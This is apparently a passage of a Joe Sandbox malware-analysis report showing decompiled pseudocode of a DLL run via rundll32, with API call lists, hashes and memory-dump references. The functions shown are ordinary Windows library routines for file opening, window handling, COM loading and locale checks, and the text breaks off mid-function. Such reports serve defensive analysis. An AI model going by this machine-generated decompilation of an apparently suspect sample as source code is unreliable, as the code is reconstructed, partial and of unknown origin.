                                                                                                            • Instruction ID: d7a2f0cc547cc5a266f2ab8e80424e9948fc94c4121f0c35bce9c1610e35d146
                                                                                                            • Opcode Fuzzy Hash: e890f0e6bb8d7fafe3cff4ca8cca7ae2ad4144aa324fa51ad2fccd96fbd137c1
                                                                                                            • Instruction Fuzzy Hash: D551D4B1A002199FDB04CFA9C8889EEBBF9FF48314F14456EE506EB250E774A941CF60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10025A6D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E10025A6D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, CHAR* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v268;
				struct _SECURITY_ATTRIBUTES _v280;
				void* __ebp;
				intOrPtr _t40;
				signed int _t43;
				signed int _t51;
				signed int _t53;
				long _t58;
				void* _t60;
				void* _t69;
				signed int _t73;
				long _t79;
				long _t81;
				void* _t83;
				signed int _t86;
				intOrPtr _t87;

				_t40 =  *0x1004c470; // 0x6edecb8c
				_t83 = __ecx;
				 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				 *(__ecx + 4) =  *(__ecx + 4) | 0xffffffff;
				_t85 = __ecx + 0xc;
				_v8 = _t40;
				_t73 = _a8 & 0xffff7fff;
				E10006935(_t73, __ecx + 0xc);
				if(lstrlenA(_a4) >= 0x104 || E1002592C(_t73, _t83, _t85,  &_v268, _a4) == 0) {
					L30:
					_t43 = 0;
					goto L31;
				} else {
					E10006AEC(_t85,  &_v268);
					_t81 = 3;
					_t51 = _t73 & _t81;
					_a8 = 0;
					if(_t51 == 0) {
						_a8 = 0x80000000;
					} else {
						_t69 = _t51 - 1;
						if(_t69 == 0) {
							_a8 = 0x40000000;
						} else {
							if(_t69 == 1) {
								_a8 = 0xc0000000;
							}
						}
					}
					_t53 = _t73 & 0x00000070;
					_t86 = 1;
					if(_t53 == 0 || _t53 == 0x10) {
						L13:
						_t81 = 0;
						goto L14;
					} else {
						if(_t53 == 0x20) {
							_t81 = _t86;
							L14:
							_v280.nLength = 0xc;
							_v280.lpSecurityDescriptor = 0;
							_v280.bInheritHandle =  !(_t73 >> 7) & _t86;
							if((_t73 & 0x00000010) == 0) {
								_t58 = 3;
							} else {
								asm("sbb eax, eax");
								_t58 = ( ~(_t73 & 0x00002000) & 0x00000002) + 2;
							}
							_t79 = 0x80;
							if((_t73 & 0x00010000) != 0) {
								_t79 = 0x20000080;
							}
							if((_t73 & 0x00020000) != 0) {
								_t79 = _t79 | 0x80000000;
							}
							if((_t73 & 0x00040000) != 0) {
								_t79 = _t79 | 0x10000000;
							}
							if((_t73 & 0x00080000) != 0) {
								_t79 = _t79 | 0x08000000;
							}
							_t60 = CreateFileA(_a4, _a8, _t81,  &_v280, _t58, _t79, 0);
							if(_t60 != 0xffffffff) {
								 *(_t83 + 4) = _t60;
								 *(_t83 + 8) = _t86;
								_t43 = _t86;
								L31:
								return E100117AE(_t43, _v8);
							} else {
								_t87 = _a12;
								if(_t87 != 0) {
									 *((intOrPtr*)(_t87 + 0xc)) = GetLastError();
									 *((intOrPtr*)(_t87 + 8)) = E10026E5B(_t61);
									E10006AEC(_t87 + 0x10, _a4);
								}
								goto L30;
							}
						}
						if(_t53 == 0x30) {
							_t81 = 2;
							goto L14;
						}
						if(_t53 == 0x40) {
							goto L14;
						}
						goto L13;
					}
				}
			}




















                                                                                                            0x10025a76
                                                                                                            0x10025a81
                                                                                                            0x10025a83
                                                                                                            0x10025a87
                                                                                                            0x10025a8b
                                                                                                            0x10025a90
                                                                                                            0x10025a93
                                                                                                            0x10025a99
                                                                                                            0x10025aac
                                                                                                            0x10025be5
                                                                                                            0x10025be5
                                                                                                            0x00000000
                                                                                                            0x10025ac9
                                                                                                            0x10025ad2
                                                                                                            0x10025adb
                                                                                                            0x10025ae0
                                                                                                            0x10025ae2
                                                                                                            0x10025ae5
                                                                                                            0x10025aff
                                                                                                            0x10025ae7
                                                                                                            0x10025ae7
                                                                                                            0x10025ae8
                                                                                                            0x10025af6
                                                                                                            0x10025aea
                                                                                                            0x10025aeb
                                                                                                            0x10025aed
                                                                                                            0x10025aed
                                                                                                            0x10025aeb
                                                                                                            0x10025ae8
                                                                                                            0x10025b08
                                                                                                            0x10025b0d
                                                                                                            0x10025b0e
                                                                                                            0x10025b24
                                                                                                            0x10025b24
                                                                                                            0x00000000
                                                                                                            0x10025b15
                                                                                                            0x10025b18
                                                                                                            0x10025b61
                                                                                                            0x10025b26
                                                                                                            0x10025b32
                                                                                                            0x10025b3c
                                                                                                            0x10025b42
                                                                                                            0x10025b48
                                                                                                            0x10025b67
                                                                                                            0x10025b4a
                                                                                                            0x10025b53
                                                                                                            0x10025b59
                                                                                                            0x10025b59
                                                                                                            0x10025b6e
                                                                                                            0x10025b73
                                                                                                            0x10025b75
                                                                                                            0x10025b75
                                                                                                            0x10025b80
                                                                                                            0x10025b82
                                                                                                            0x10025b82
                                                                                                            0x10025b8e
                                                                                                            0x10025b90
                                                                                                            0x10025b90
                                                                                                            0x10025b9c
                                                                                                            0x10025b9e
                                                                                                            0x10025b9e
                                                                                                            0x10025bb6
                                                                                                            0x10025bbf
                                                                                                            0x10025bf6
                                                                                                            0x10025bf9
                                                                                                            0x10025bfc
                                                                                                            0x10025be7
                                                                                                            0x10025bf3
                                                                                                            0x10025bc1
                                                                                                            0x10025bc1
                                                                                                            0x10025bc6
                                                                                                            0x10025bcf
                                                                                                            0x10025bdd
                                                                                                            0x10025be0
                                                                                                            0x10025be0
                                                                                                            0x00000000
                                                                                                            0x10025bc6
                                                                                                            0x10025bbf
                                                                                                            0x10025b1d
                                                                                                            0x10025b5e
                                                                                                            0x00000000
                                                                                                            0x10025b5e
                                                                                                            0x10025b22
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10025b22
                                                                                                            0x10025b0e

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 10025AA1
                                                                                                              • Part of subcall function 1002592C: __EH_prolog.LIBCMT ref: 10025931
                                                                                                              • Part of subcall function 1002592C: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                                                              • Part of subcall function 1002592C: lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,00000000), ref: 10025BB6
                                                                                                            • GetLastError.KERNEL32 ref: 10025BC8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorFileFullH_prologLastNamePathlstrcpynlstrlen
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 4207171074-4125583295
                                                                                                            • Opcode ID: 8c59be7035e985f6fea5b2ca5dcb1a7e57374fcad9b326a003094a27d539e147
                                                                                                            • Instruction ID: b9e8efc14b2e37d74310b66cc6c275d2155126b32d67271340f07ea8c5c0b371
                                                                                                            • Opcode Fuzzy Hash: 8c59be7035e985f6fea5b2ca5dcb1a7e57374fcad9b326a003094a27d539e147
                                                                                                            • Instruction Fuzzy Hash: 2141E771A00615ABEB12CF25EC82BDE77E4EB04391F90C529E917CB1D0DB7AD981CB54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10033B73 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 95%
                                                                                                            			E10033B73(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
				intOrPtr _v8;
				void* __ebp;
				int _t42;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t74;
				intOrPtr _t76;
				void* _t77;

				_t69 = __edx;
				_push(__ecx);
				_t71 = _a4;
				_v8 = __ecx;
				if( *((intOrPtr*)(_t71 + 0x84)) == 0) {
					L6:
					if(( *(_t71 + 0x7c) & 0x00000004) != 0) {
						_a16 = _a16 | 0x00000004;
						if((_a17 & 0x00000050) != 0) {
							_a16 = _a16 & 0xffff2fff | 0x00002000;
						}
					}
					_t74 = E100339A3(_v8, _a16);
					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
					if( *(_t74 + 0x34) == 0) {
						 *(_t74 + 0x34) =  *(_t71 + 0x1c);
					}
					E1002D821(E10020230(_t74, 0xe81f), _t69, _t71, 0);
					 *((intOrPtr*)( *_t74 + 0x144))(1);
					_t42 = GetWindowLongA( *(_t71 + 0x1c), 0xfffffff0);
					if((_t42 & 0x10000000) == 0) {
						L14:
						return _t42;
					} else {
						E100203AD(_t74, 8);
						L13:
						_t42 = UpdateWindow( *(_t74 + 0x1c));
						goto L14;
					}
				}
				_t76 =  *((intOrPtr*)(_t71 + 0x88));
				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x90)) == 0 || E1002D0E3(_t76) != 1 || ( *(_t76 + 0x7c) & _a16 & 0x000000f0) == 0) {
					goto L6;
				} else {
					_t74 = E100220EE(_t77, GetParent( *(_t76 + 0x1c)));
					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
					 *((intOrPtr*)( *_t74 + 0x144))(1);
					goto L13;
				}
			}











                                                                                                            0x10033b73
                                                                                                            0x10033b76
                                                                                                            0x10033b7a
                                                                                                            0x10033b85
                                                                                                            0x10033b88
                                                                                                            0x10033be7
                                                                                                            0x10033beb
                                                                                                            0x10033bed
                                                                                                            0x10033bf5
                                                                                                            0x10033c04
                                                                                                            0x10033c04
                                                                                                            0x10033bf5
                                                                                                            0x10033c19
                                                                                                            0x10033c21
                                                                                                            0x10033c29
                                                                                                            0x10033c2e
                                                                                                            0x10033c2e
                                                                                                            0x10033c41
                                                                                                            0x10033c4c
                                                                                                            0x10033c57
                                                                                                            0x10033c62
                                                                                                            0x10033c76
                                                                                                            0x10033c7a
                                                                                                            0x10033c64
                                                                                                            0x10033c68
                                                                                                            0x10033c6d
                                                                                                            0x10033c70
                                                                                                            0x00000000
                                                                                                            0x10033c70
                                                                                                            0x10033c62
                                                                                                            0x10033b8a
                                                                                                            0x10033b92
                                                                                                            0x00000000
                                                                                                            0x10033bb3
                                                                                                            0x10033bc9
                                                                                                            0x10033bd1
                                                                                                            0x10033bdc
                                                                                                            0x00000000
                                                                                                            0x10033bdc

                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 10033BB6
                                                                                                              • Part of subcall function 100204FE: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,10021B8B,?,10021B8B,00000000,?,?,000000FF,000000FF,00000015), ref: 10020524
                                                                                                            • GetWindowLongA.USER32 ref: 10033C57
                                                                                                            • UpdateWindow.USER32(?), ref: 10033C70
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$LongParentUpdate
                                                                                                            • String ID: P
                                                                                                            • API String ID: 1906497633-3110715001
                                                                                                            • Opcode ID: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
                                                                                                            • Instruction ID: 435d97fdf23aa9ac89b11464d0137bb6244da47e738824af3fb8fae0d11c22b6
                                                                                                            • Opcode Fuzzy Hash: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
                                                                                                            • Instruction Fuzzy Hash: 1D31BE74600749AFDB12DF24DC89FAEBBE9EF00355F008519F952AA6A2CB71AC50CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10025CEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 87%
                                                                                                            			E10025CEC(void* __ecx, void* __eflags) {
				intOrPtr* _t21;
				void* _t25;
				struct HINSTANCE__* _t26;
				_Unknown_base(*)()* _t30;
				void* _t39;
				CHAR* _t40;
				void* _t42;
				signed int* _t43;
				void* _t44;
				void* _t46;

				E10011BF0(0x1003acec, _t46);
				_t43 =  *(_t46 + 0x10);
				 *_t43 =  *_t43 & 0x00000000;
				E10025C6A(_t46 - 0x10,  *((intOrPtr*)(_t46 + 8)));
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				_t21 = E100243B2();
				_t38 =  *_t21;
				 *(_t46 + 0x10) =  *((intOrPtr*)( *_t21 + 0xc))(_t39, _t42, __ecx) + 0x10;
				 *(_t46 - 4) = 1;
				_t25 = E1002583A( *((intOrPtr*)(_t46 - 0x10)), _t46 + 0x10);
				_t40 =  *(_t46 + 0x10);
				if(_t25 != 0) {
					_t26 = LoadLibraryA(_t40);
					if(_t26 == 0) {
						goto L1;
					}
					_t30 = GetProcAddress(_t26, "DllGetClassObject");
					if(_t30 == 0) {
						_t44 = 0x800401f9;
					} else {
						_t44 =  *_t30( *((intOrPtr*)(_t46 + 8)),  *((intOrPtr*)(_t46 + 0xc)), _t43);
					}
					L6:
					E100014B0(_t40 - 0x10, _t38);
					E100014B0( *((intOrPtr*)(_t46 - 0x10)) + 0xfffffff0, _t38);
					 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
					return _t44;
				}
				L1:
				_t44 = 0x80040154;
				goto L6;
			}













                                                                                                            0x10025cf1
                                                                                                            0x10025cf8
                                                                                                            0x10025cfb
                                                                                                            0x10025d06
                                                                                                            0x10025d0b
                                                                                                            0x10025d0f
                                                                                                            0x10025d14
                                                                                                            0x10025d1e
                                                                                                            0x10025d28
                                                                                                            0x10025d2c
                                                                                                            0x10025d33
                                                                                                            0x10025d36
                                                                                                            0x10025d40
                                                                                                            0x10025d48
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10025d50
                                                                                                            0x10025d58
                                                                                                            0x10025d67
                                                                                                            0x10025d5a
                                                                                                            0x10025d63
                                                                                                            0x10025d63
                                                                                                            0x10025d6c
                                                                                                            0x10025d6f
                                                                                                            0x10025d7a
                                                                                                            0x10025d86
                                                                                                            0x10025d8e
                                                                                                            0x10025d8e
                                                                                                            0x10025d38
                                                                                                            0x10025d38
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 10025CF1
                                                                                                              • Part of subcall function 10025C6A: wsprintfA.USER32 ref: 10025CC5
                                                                                                              • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
                                                                                                              • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
                                                                                                              • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
                                                                                                              • Part of subcall function 1002583A: RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
                                                                                                              • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258CB
                                                                                                              • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D0
                                                                                                              • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D5
                                                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,10025DBC,?,100430A8,00000000), ref: 10025D40
                                                                                                            • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 10025D50
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen$AddressH_prologLibraryLoadProcQueryValuewsprintf
                                                                                                            • String ID: DllGetClassObject
                                                                                                            • API String ID: 821125782-1075368562
                                                                                                            • Opcode ID: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
                                                                                                            • Instruction ID: 4c2bc5ab8f47dce9d6dfca02a5288212b81b2082d3bc100dcb553b8fe7e2210e
                                                                                                            • Opcode Fuzzy Hash: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
                                                                                                            • Instruction Fuzzy Hash: CB11BC3260021AAFDB11DFA4DC08BAF77B8FF00356F044969F812E7261DB34E9018BA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10034C5F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E10034C5F(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v16;
				char _v276;
				intOrPtr _t10;
				long _t12;
				void* _t13;
				CHAR* _t16;
				void* _t30;
				void* _t33;

				_t10 =  *0x1004c470; // 0x6edecb8c
				_v8 = _t10;
				_t12 = GetModuleFileNameA( *(__ecx + 0x40),  &_v276, 0x104);
				if(_t12 == 0 || _t12 == 0x104) {
					L4:
					_t13 = 0;
				} else {
					_push(__esi);
					_push(__edi);
					_t16 = PathFindExtensionA( &_v276);
					asm("movsd");
					asm("movsw");
					asm("movsb");
					_pop(_t30);
					_pop(_t33);
					if(_t16 -  &_v276 + 7 > 0x104) {
						goto L4;
					} else {
						lstrcpyA(_t16,  &_v16);
						_t13 = E10034959(0x104, _t30, _t33,  &_v276);
					}
				}
				return E100117AE(_t13, _v8);
			}












                                                                                                            0x10034c68
                                                                                                            0x10034c6e
                                                                                                            0x10034c81
                                                                                                            0x10034c89
                                                                                                            0x10034cd6
                                                                                                            0x10034cd6
                                                                                                            0x10034c8f
                                                                                                            0x10034c8f
                                                                                                            0x10034c90
                                                                                                            0x10034c98
                                                                                                            0x10034ca6
                                                                                                            0x10034ca7
                                                                                                            0x10034cb3
                                                                                                            0x10034cb9
                                                                                                            0x10034cba
                                                                                                            0x10034cbb
                                                                                                            0x00000000
                                                                                                            0x10034cbd
                                                                                                            0x10034cc2
                                                                                                            0x10034ccf
                                                                                                            0x10034ccf
                                                                                                            0x10034cbb
                                                                                                            0x10034ce2

                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10034C81
                                                                                                            • PathFindExtensionA.SHLWAPI(?), ref: 10034C98
                                                                                                            • lstrcpyA.KERNEL32(00000000,?), ref: 10034CC2
                                                                                                              • Part of subcall function 10034959: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
                                                                                                              • Part of subcall function 10034959: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
                                                                                                              • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
                                                                                                              • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
                                                                                                              • Part of subcall function 10034959: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
                                                                                                              • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
                                                                                                              • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                                                                                            • String ID: %s.dll
                                                                                                            • API String ID: 4178508759-3668843792
                                                                                                            • Opcode ID: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
                                                                                                            • Instruction ID: 2fc2d964ca32bfe118a4256934f177e00eb1d7d938e4b77c6fceda29c47fe86b
                                                                                                            • Opcode Fuzzy Hash: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
                                                                                                            • Instruction Fuzzy Hash: 4601A7B6E0111CAFDF56EBA4CC85DEE77BCFB49341F0105BAE615DB110EAB0AA448B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100364C3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 59%
                                                                                                            			E100364C3() {
				signed short _v16;
				signed short _v20;
				char _v24;
				signed int _t6;
				intOrPtr* _t16;
				signed int _t19;

				_t6 =  *0x1004b8c8; // 0xffffffff
				if(_t6 != 0xffffffff) {
					return _t6;
				}
				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
				_t19 = 0x40000;
				if(_t16 != 0) {
					E10011C50( &_v24, 0, 0x14);
					_push( &_v24);
					_v24 = 0x14;
					if( *_t16() >= 0) {
						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
					}
				}
				 *0x1004b8c8 = _t19;
				return _t19;
			}









                                                                                                            0x100364c9
                                                                                                            0x100364d1
                                                                                                            0x10036530
                                                                                                            0x10036530
                                                                                                            0x100364ec
                                                                                                            0x100364f0
                                                                                                            0x100364f5
                                                                                                            0x100364ff
                                                                                                            0x1003650a
                                                                                                            0x1003650b
                                                                                                            0x10036516
                                                                                                            0x10036523
                                                                                                            0x10036523
                                                                                                            0x10036516
                                                                                                            0x10036525
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(COMCTL32.DLL), ref: 100364DA
                                                                                                            • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 100364E6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: COMCTL32.DLL$DllGetVersion
                                                                                                            • API String ID: 1646373207-1518460440
                                                                                                            • Opcode ID: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
                                                                                                            • Instruction ID: 84e3accee20d911db9e507edd914a9ca92682ab11397d206feed8d4dda6cc4c4
                                                                                                            • Opcode Fuzzy Hash: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
                                                                                                            • Instruction Fuzzy Hash: 3BF04FB1E006296AE702DBED9C84BAA7BACEB08751F510535FA10EB191E670DD0487B5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10029A8E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E10029A8E(struct HWND__* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v20;
				intOrPtr _t9;
				signed int _t17;

				_t9 =  *0x1004c470; // 0x6edecb8c
				_v8 = _t9;
				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
					_t10 = 0;
				} else {
					GetClassNameA(_a4,  &_v20, 0xa);
					_t17 = lstrcmpiA( &_v20, "combobox");
					asm("sbb eax, eax");
					_t10 =  ~_t17 + 1;
				}
				return E100117AE(_t10, _v8);
			}







                                                                                                            0x10029a98
                                                                                                            0x10029a9d
                                                                                                            0x10029aa0
                                                                                                            0x10029ab5
                                                                                                            0x10029ab9
                                                                                                            0x10029ac2
                                                                                                            0x10029ad1
                                                                                                            0x10029ad9
                                                                                                            0x10029adb
                                                                                                            0x10029adb
                                                                                                            0x10029ae5

                                                                                                            APIs
                                                                                                            • GetWindowLongA.USER32 ref: 10029AA7
                                                                                                            • GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
                                                                                                            • lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassLongNameWindowlstrcmpi
                                                                                                            • String ID: combobox
                                                                                                            • API String ID: 2054663530-2240613097
                                                                                                            • Opcode ID: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
                                                                                                            • Instruction ID: 60cbb10a2f119aa8ec71494133184de8fc03b2720933236f2cbab57e6d3057ab
                                                                                                            • Opcode Fuzzy Hash: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
                                                                                                            • Instruction Fuzzy Hash: 32F03A3151421CAFDB01EFA5CC95EAE3BB4FB05385F508524F821DA1A1DB30AA448B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10019599 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 62%
                                                                                                            			E10019599(void* __eflags) {
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;

				_push(0x10);
				_push(0x10042d28);
				E10012514(_t13, _t14, _t15);
				_t9 =  *0x1004f820;
				if(_t9 == 0) {
					if( *0x1004f3e0 == 1) {
						L4:
						_t9 = 0x10019589;
